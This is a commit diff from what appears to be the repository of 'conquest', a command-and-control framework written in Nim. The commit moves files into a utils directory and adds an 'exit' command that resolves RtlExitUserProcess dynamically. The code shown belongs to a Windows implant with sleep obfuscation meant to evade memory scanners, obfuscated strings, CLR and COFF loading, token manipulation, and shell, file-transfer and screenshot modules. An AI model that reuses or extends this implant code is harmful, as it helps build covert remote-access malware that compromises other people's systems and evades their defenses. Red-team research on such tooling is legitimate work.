admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated directory structure and added simple 'exit' command to terminate an agent.

Browse Source
This commit is contained in:
Jakob Friedl
2025-10-23 17:28:07 +02:00
parent c6875e5eb2
commit 432f37755c
25 changed files with 90 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/agent/core/clr.nim
View File

@@ -1,6 +1,6 @@
import winim/[lean, clr]
import os, strformat, strutils, sequtils
import ./[hwbp, io]
import ../utils/[hwbp, io]
import ../../common/[types, utils]
#[

2
src/agent/core/coff.nim
View File

@@ -1,6 +1,6 @@
import winim/lean
import os, strformat, strutils, ptr_math
import ./[beacon, io]
import ../utils/[beacon, io]
import ../../common/[types, utils, serialize]
#[

2
src/agent/core/context.nim
View File

@@ -1,5 +1,5 @@
import parsetoml, base64, system
import ./io
import ../utils/io
import ../../common/[types, utils, crypto, serialize]
const CONFIGURATION {.strdefine.}: string = ""

2
src/agent/core/http.nim
View File

@@ -1,5 +1,5 @@
import httpclient, json, strformat, strutils, asyncdispatch, base64, tables, parsetoml, random
import ./io
import ../utils/io
import ../../common/[types, utils, profile]
proc httpGet*(ctx: AgentCtx, heartbeat: seq[byte]): string =

3
src/agent/core/sleepmask.nim
View File

@@ -1,8 +1,7 @@
import winim/lean
import winim/inc/tlhelp32
import os, system, strformat, random
import ./[cfg, io]
import ../utils/[cfg, io]
import ../../common/[types, utils, crypto]
# Different sleep obfuscation techniques, reimplemented in Nim (Ekko, Zilean, Foliage)

2
src/agent/core/token.nim
View File

@@ -1,6 +1,6 @@
import winim/lean
import strformat
import ./io
import ../utils/io
import ../../common/[types, utils]
#[

13
src/agent/main.nim
View File

@@ -1,6 +1,7 @@
import strformat, os, times, system, base64, random
import core/[http, context, sleepmask, io]
import core/[http, context, sleepmask]
import utils/io
import protocol/[task, result, heartbeat, registration]
import ../common/[types, utils, crypto]
@@ -24,21 +25,21 @@ proc main() =
#[
Agent routine:
1. Sleep Obfuscation
2. Retrieve task from /tasks endpoint
3. Execute task and post result to /results
4. If additional tasks have been fetched, go to 2.
2. Retrieve tasks via checkin request to a GET endpoint
3. Execute task and post result
4. If additional tasks have been fetched, go to 3.
5. If no more tasks need to be executed, go to 1.
]#
while true:
# Sleep obfuscation to evade memory scanners
sleepObfuscate(ctx.sleepSettings)
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
let date: string = now().format(protect("dd-MM-yyyy HH:mm:ss"))
print "\n", fmt"[*] [{date}] Checking in."
try:
# Retrieve task queue for the current agent by sending a check-in/heartbeat request
# The check-in request contains the agentId, listenerId, so the server knows which tasks to return
# The check-in request contains the agentId and listenerId, so the server knows which tasks to return
var heartbeat: Heartbeat = ctx.createHeartbeat()
let
heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)

2
src/agent/protocol/task.nim
View File

@@ -1,7 +1,7 @@
import strutils, tables, json, strformat, zippy
import ./result
import ../core/io
import ../utils/io
import ../../modules/manager
import ../../common/[types, serialize, sequence, crypto, utils]

0
src/agent/core/beacon.nim → src/agent/utils/beacon.nim
View File

0
src/agent/core/cfg.nim → src/agent/utils/cfg.nim
View File

0
src/agent/core/hwbp.nim → src/agent/utils/hwbp.nim
View File

0
src/agent/core/io.nim → src/agent/utils/io.nim
View File

5
src/client/views/console.nim
View File

@@ -147,9 +147,8 @@ proc callback(data: ptr ImGuiInputTextCallbackData): cint {.cdecl.} =
Handling console commands
]#
proc displayHelp(component: ConsoleComponent) =
for module in getModules(component.agent.modules):
for cmd in module.commands:
component.console.addItem(LOG_OUTPUT, " * " & cmd.name.alignLeft(25) & cmd.description)
for cmd in getCommands(component.agent.modules):
component.console.addItem(LOG_OUTPUT, " * " & cmd.name.alignLeft(25) & cmd.description)
proc displayCommandHelp(component: ConsoleComponent, command: Command) =
var usage = command.name & " " & command.arguments.mapIt(

1
src/common/types.nim
View File

@@ -58,6 +58,7 @@ type
CMD_TOKEN_INFO = 21'u16
CMD_ENABLE_PRIV = 22'u16
CMD_DISABLE_PRIV = 23'u16
CMD_EXIT = 24'u16
StatusType* = enum
STATUS_COMPLETED = 0'u8

3
src/modules/bof.nim
View File

@@ -30,7 +30,8 @@ when not defined(agent):
when defined(agent):
import osproc, strutils, strformat
import ../agent/core/[coff, io]
import ../agent/core/coff
import ../agent/utils/io
import ../agent/protocol/result
import ../common/[utils, serialize]

3
src/modules/dotnet.nim
View File

@@ -30,7 +30,8 @@ when not defined(agent):
when defined(agent):
import strutils, strformat
import ../agent/core/[clr, io]
import ../agent/core/clr
import ../agent/utils/io
import ../agent/protocol/result
import ../common/[utils, serialize]

46
src/modules/exit.nim Normal file
View File

@@ -0,0 +1,46 @@
import ../common/[types, utils]
# Define function prototype
proc executeExit(ctx: AgentCtx, task: Task): TaskResult
# Module definition
let commands* = @[
Command(
name: protect("exit"),
commandType: CMD_EXIT,
description: protect("Exit the agent process."),
example: protect("exit"),
arguments: @[
],
execute: executeExit
)
]
# Implement execution functions
when not defined(agent):
proc executeExit(ctx: AgentCtx, task: Task): TaskResult = nil
when defined(agent):
import winim/lean
import strutils, strformat
import ../agent/utils/io
import ../agent/protocol/result
import ../common/[utils, serialize]
type
RtlExitUserThread = proc(exitStatus: NTSTATUS): VOID {.stdcall.}
RtlExitUserProcess = proc(exitStatus: NTSTATUS): VOID {.stdcall.}
proc executeExit(ctx: AgentCtx, task: Task): TaskResult =
try:
let
hNtdll = GetModuleHandleA(protect("ntdll"))
pRtlExitUserThread = cast[RtlExitUserThread](GetProcAddress(hNtdll, protect("RtlExitUserThread")))
pRtlExitUserProcess = cast[RtlExitUserProcess](GetProcAddress(hNtdll, protect("RtlExitUserProcess")))
print " [>] Exiting."
pRtlExitUserProcess(STATUS_SUCCESS)
except CatchableError as err:
return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))

2
src/modules/filesystem.nim
View File

@@ -101,7 +101,7 @@ when not defined(agent):
when defined(agent):
import os, strutils, strformat, times, algorithm, winim
import ../agent/core/io
import ../agent/utils/io
import ../agent/protocol/result
import ../common/utils

2
src/modules/filetransfer.nim
View File

@@ -41,7 +41,7 @@ when not defined(agent):
when defined(agent):
import os, std/paths, strutils, strformat
import ../agent/core/io
import ../agent/utils/io
import ../agent/protocol/result
import ../common/[utils, serialize]

15
src/modules/manager.nim
View File

@@ -17,6 +17,16 @@ proc registerModule(module: Module) {.discardable.} =
manager.commandsByType[cmd.commandType] = cmd
manager.commandsByName[cmd.name] = cmd
proc registerCommands(commands: seq[Command]) {.discardable.} =
for cmd in commands:
manager.commandsByType[cmd.commandType] = cmd
manager.commandsByName[cmd.name] = cmd
# Modules/commands
import exit
registerCommands(exit.commands)
# Import all modules
when (MODULES == cast[uint32](MODULE_ALL)):
import
@@ -68,7 +78,6 @@ when ((MODULES and cast[uint32](MODULE_TOKEN)) == cast[uint32](MODULE_TOKEN)):
import token
registerModule(token.module)
proc getCommandByType*(cmdType: CommandType): Command =
return manager.commandsByType[cmdType]
@@ -90,6 +99,10 @@ proc getModules*(modules: uint32 = 0): seq[Module] =
result.add(m)
proc getCommands*(modules: uint32 = 0): seq[Command] =
# House-keeping
result.add(manager.commandsByType[CMD_EXIT])
# Modules
if modules == 0:
for m in manager.modules:
result.add(m.commands)

2
src/modules/screenshot.nim
View File

@@ -30,7 +30,7 @@ when defined(agent):
import winim/inc/wingdi
import strutils, strformat, times, pixie
import stb_image/write as stbiw
import ../agent/core/io
import ../agent/utils/io
import ../agent/protocol/result
import ../common/[utils, serialize]

2
src/modules/shell.nim
View File

@@ -30,7 +30,7 @@ when not defined(agent):
when defined(agent):
import osproc, strutils, strformat
import ../agent/core/io
import ../agent/utils/io
import ../agent/protocol/result
import ../common/utils

4
src/modules/sleep.nim
View File

@@ -42,7 +42,7 @@ when not defined(agent):
when defined(agent):
import os, strutils, strformat
import ../agent/core/io
import ../agent/utils/io
import ../agent/protocol/result
import ../common/utils
@@ -69,7 +69,7 @@ when defined(agent):
case int(task.argCount):
of 0:
# Retrieve sleepmask settings
let response = fmt"Sleepmask settings: Technique: {$ctx.sleepSettings.sleepTechnique}, Delay: {$ctx.sleepSettings.sleepDelay}ms, Jitter: {$ctx.sleepSettings.jitter}, Stack spoofing: {$ctx.sleepSettings.spoofStack}"
let response = fmt"Sleepmask settings: Technique: {$ctx.sleepSettings.sleepTechnique}, Delay: {$ctx.sleepSettings.sleepDelay}ms, Jitter: {$ctx.sleepSettings.jitter}%, Stack spoofing: {$ctx.sleepSettings.spoofStack}"
return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(response))
of 1:

2
src/modules/systeminfo.nim
View File

@@ -38,7 +38,7 @@ when defined(agent):
import winim
import os, strutils, sequtils, strformat, tables, algorithm
import ../agent/core/io
import ../agent/utils/io
import ../agent/protocol/result
import ../common/utils

3
src/modules/token.nim
View File

@@ -88,7 +88,8 @@ when not defined(agent):
when defined(agent):
import winim, strutils, strformat
import ../agent/core/[token, io]
import ../agent/core/token
import ../agent/utils/io
import ../agent/protocol/result
import ../common/utils